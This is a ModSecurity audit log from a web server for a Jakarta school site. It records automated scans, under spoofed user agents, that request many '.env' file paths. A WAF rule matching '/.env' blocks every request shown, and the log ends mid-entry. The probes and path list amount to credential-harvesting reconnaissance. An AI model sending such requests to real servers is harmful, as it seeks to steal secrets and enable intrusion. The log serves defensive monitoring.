aDQ_U8-W3hHsdQpQwdTyqAAAAMY 103.236.140.4 55282 103.236.140.4 8181 --d3077d34-B-- GET /.env.example HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.4; es-us; GT-I9100 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 --d3077d34-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3077d34-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254547792642 851 (- - -) Stopwatch2: 1748254547792642 851; combined=289, p1=245, p2=0, p3=0, p4=0, p5=44, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3077d34-Z-- --a4910307-A-- [26/May/2025:17:15:49 +0700] aDQ_Vc-W3hHsdQpQwdTytAAAAMo 103.236.140.4 55320 103.236.140.4 8181 --a4910307-B-- GET /.env.production HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SM-T113 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.137 Safari/537.36 --a4910307-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a4910307-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254549121024 663 (- - -) Stopwatch2: 1748254549121024 663; combined=246, p1=217, p2=0, p3=0, p4=0, p5=28, sr=54, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a4910307-Z-- --be6f907f-A-- [26/May/2025:17:15:49 +0700] aDQ_Vf7lSIOiZEhmvSx5TQAAAE8 103.236.140.4 55326 103.236.140.4 8181 --be6f907f-B-- GET /.env.example HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36 OPR/35.0.2066.82 --be6f907f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --be6f907f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254549194101 659 (- - -) Stopwatch2: 1748254549194101 659; combined=296, p1=268, p2=0, p3=0, p4=0, p5=28, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --be6f907f-Z-- --e913181a-A-- [26/May/2025:17:15:51 +0700] aDQ_V8-W3hHsdQpQwdTyvwAAANc 103.236.140.4 55392 103.236.140.4 8181 --e913181a-B-- GET /.env.production HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.2.28) Gecko/20120306 AskTbSTC-SRS/3.13.1.18132 Firefox/3.6.28 (.NET CLR 3.5.30729) --e913181a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e913181a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254551398483 669 (- - -) Stopwatch2: 1748254551398483 669; combined=249, p1=218, p2=0, p3=0, p4=0, p5=31, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e913181a-Z-- --a6debd32-A-- [26/May/2025:17:15:54 +0700] aDQ_Wv7lSIOiZEhmvSx5bwAAAFA 103.236.140.4 55506 103.236.140.4 8181 --a6debd32-B-- GET /media/.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SM-T113 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.137 Safari/537.36 --a6debd32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6debd32-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254554833314 787 (- - -) Stopwatch2: 1748254554833314 787; combined=264, p1=231, p2=0, p3=0, p4=0, p5=33, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6debd32-Z-- --f0772635-A-- [26/May/2025:17:15:56 +0700] aDQ_XM-W3hHsdQpQwdTy0wAAANE 103.236.140.4 55560 103.236.140.4 8181 --f0772635-B-- GET /server/.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Opera/9.62 (Windows NT 6.0; U; de) Presto/2.1.1 --f0772635-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f0772635-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254556409091 622 (- - -) Stopwatch2: 1748254556409091 622; combined=237, p1=212, p2=0, p3=0, p4=0, p5=25, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0772635-Z-- --31a7596e-A-- [26/May/2025:17:15:58 +0700] aDQ_XlSmKJQK-9oQ9SRLmAAAAJc 103.236.140.4 55632 103.236.140.4 8181 --31a7596e-B-- GET /media/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 --31a7596e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --31a7596e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254558620771 814 (- - -) Stopwatch2: 1748254558620771 814; combined=307, p1=268, p2=0, p3=0, p4=0, p5=39, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --31a7596e-Z-- --08333a68-A-- [26/May/2025:17:15:58 +0700] aDQ_XlSmKJQK-9oQ9SRLnAAAAI8 103.236.140.4 55642 103.236.140.4 8181 --08333a68-B-- GET /staging/.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) --08333a68-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --08333a68-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254558827679 824 (- - -) Stopwatch2: 1748254558827679 824; combined=313, p1=278, p2=0, p3=0, p4=0, p5=35, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --08333a68-Z-- --67d4b149-A-- [26/May/2025:17:16:00 +0700] aDQ_YFSmKJQK-9oQ9SRLpQAAAIk 103.236.140.4 55692 103.236.140.4 8181 --67d4b149-B-- GET /server/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB7.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; CMDTDFJS) --67d4b149-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --67d4b149-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254560155652 824 (- - -) Stopwatch2: 1748254560155652 824; combined=315, p1=278, p2=0, p3=0, p4=0, p5=37, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --67d4b149-Z-- --4ed48a78-A-- [26/May/2025:17:16:01 +0700] aDQ_YVSmKJQK-9oQ9SRLrwAAAJE 103.236.140.4 55726 103.236.140.4 8181 --4ed48a78-B-- GET /twilio/.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) AppleWebKit/538.1 (KHTML, like Gecko) fancybrowser Safari/538.1 --4ed48a78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4ed48a78-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254561141449 878 (- - -) Stopwatch2: 1748254561141449 878; combined=366, p1=331, p2=0, p3=0, p4=0, p5=35, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4ed48a78-Z-- --13d41760-A-- [26/May/2025:17:16:01 +0700] aDQ_YXFOzWd_Ai7zJXWuLAAAAA0 103.236.140.4 55750 103.236.140.4 8181 --13d41760-B-- GET /staging/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 --13d41760-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13d41760-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254561866983 678 (- - -) Stopwatch2: 1748254561866983 678; combined=220, p1=193, p2=0, p3=0, p4=0, p5=27, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13d41760-Z-- --f64d4532-A-- [26/May/2025:17:16:02 +0700] aDQ_Yv7lSIOiZEhmvSx5jAAAAFc 103.236.140.4 55778 103.236.140.4 8181 --f64d4532-B-- GET /.env.save HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (iPod touch; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 --f64d4532-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f64d4532-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254562758600 962 (- - -) Stopwatch2: 1748254562758600 962; combined=343, p1=306, p2=0, p3=0, p4=0, p5=37, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f64d4532-Z-- --0d7a6422-A-- [26/May/2025:17:16:04 +0700] aDQ_ZM-W3hHsdQpQwdTzCAAAANA 103.236.140.4 55818 103.236.140.4 8181 --0d7a6422-B-- GET /twilio/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0 --0d7a6422-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d7a6422-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254564044265 839 (- - -) Stopwatch2: 1748254564044265 839; combined=320, p1=279, p2=0, p3=0, p4=0, p5=40, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d7a6422-Z-- --5bad7779-A-- [26/May/2025:17:16:07 +0700] aDQ_Z8-W3hHsdQpQwdTzOQAAAMc 103.236.140.4 55942 103.236.140.4 8181 --5bad7779-B-- GET /.env.save HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Links (2.1pre15; Linux 2.4.26 i686; 158x61) --5bad7779-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5bad7779-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254567834133 818 (- - -) Stopwatch2: 1748254567834133 818; combined=322, p1=288, p2=0, p3=0, p4=0, p5=34, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5bad7779-Z-- --dd2b2707-A-- [26/May/2025:17:16:11 +0700] aDQ_a8-W3hHsdQpQwdTzTQAAAMM 103.236.140.4 56066 103.236.140.4 8181 --dd2b2707-B-- GET /config/.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-G531F Build/LMY48B) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.3 Chrome/38.0.2125.102 Mobile Safari/537.36 --dd2b2707-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dd2b2707-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254571636003 718 (- - -) Stopwatch2: 1748254571636003 718; combined=274, p1=242, p2=0, p3=0, p4=0, p5=32, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dd2b2707-Z-- --2f7ffb03-A-- [26/May/2025:17:16:12 +0700] aDQ_bFSmKJQK-9oQ9SRL2AAAAJc 103.236.140.4 56108 103.236.140.4 8181 --2f7ffb03-B-- GET /config/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.213.1 Safari/532.1 --2f7ffb03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f7ffb03-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254572895814 819 (- - -) Stopwatch2: 1748254572895814 819; combined=312, p1=273, p2=0, p3=0, p4=0, p5=39, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f7ffb03-Z-- --ab9b606b-A-- [26/May/2025:17:16:14 +0700] aDQ_bs-W3hHsdQpQwdTzcQAAANc 103.236.140.4 56162 103.236.140.4 8181 --ab9b606b-B-- GET /stage/.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9) Gecko/2008052906 Firefox/3.0.1pre --ab9b606b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab9b606b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254574382747 635 (- - -) Stopwatch2: 1748254574382747 635; combined=233, p1=208, p2=0, p3=0, p4=0, p5=24, sr=57, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab9b606b-Z-- --d612c902-A-- [26/May/2025:17:16:18 +0700] aDQ_cv7lSIOiZEhmvSx5sgAAAE4 103.236.140.4 56310 103.236.140.4 8181 --d612c902-B-- GET /stage/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.78 Safari/537.36 OPR/32.0.1953.96473 --d612c902-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d612c902-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254578965141 1088 (- - -) Stopwatch2: 1748254578965141 1088; combined=380, p1=340, p2=0, p3=0, p4=0, p5=39, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d612c902-Z-- --83e37440-A-- [26/May/2025:18:23:41 +0700] aDRPPVSmKJQK-9oQ9SSFnAAAAIY 103.236.140.4 34448 103.236.140.4 8181 --83e37440-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0 Safari/605.1.15 Accept-Charset: utf-8 --83e37440-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --83e37440-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748258621658264 679 (- - -) Stopwatch2: 1748258621658264 679; combined=270, p1=238, p2=0, p3=0, p4=0, p5=32, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83e37440-Z-- --4f3d735c-A-- [26/May/2025:18:26:00 +0700] aDRPyP7lSIOiZEhmvSyytQAAAE4 103.236.140.4 37848 103.236.140.4 8181 --4f3d735c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) 